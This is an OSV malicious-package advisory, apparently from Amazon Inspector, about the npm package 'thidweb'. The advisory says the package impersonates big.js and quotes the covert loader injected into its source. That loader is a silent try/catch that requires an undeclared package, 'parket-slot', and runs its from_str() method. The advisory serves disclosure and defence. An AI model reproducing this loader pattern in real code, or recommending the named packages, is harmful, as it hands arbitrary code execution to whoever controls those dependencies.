OSV ID
MAL-2026-6343
Ecosystem
npm
Summary
Package is published as thidweb but its README, source comments, repo URL, and author metadata all identify it as big.js v7.0.1 by Mike McLaughlin (README.md line 1: "# big.js"; big.js header: "big.js v7.0.1"; package.json repository url: https://github.com/MikeMcl/big.js.git). The source is a verbatim copy of upstream big.js with a covert loader injected mid-file at big.js:605-609: "try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }". The same block is present in big.mjs. parket-slot is not declared in package.json dependencies; the only declared dependency is log-taker@^0.0.9, which upstream big.js does not require (upstream is dependency-free). Any developer who installs thidweb (mistaking it for big.js) and imports it executes whatever code parket-slot ships, with errors silently swallowed. The combination of impersonation, undeclared runtime require, error-suppressing try/catch, and an unrelated declared dependency is a multi-stage installer-side code-execution attack.
Source: amazon-inspector (80721058923b3e5963a6ee170007b8b4131ae5093481456ca10e63f52963987d)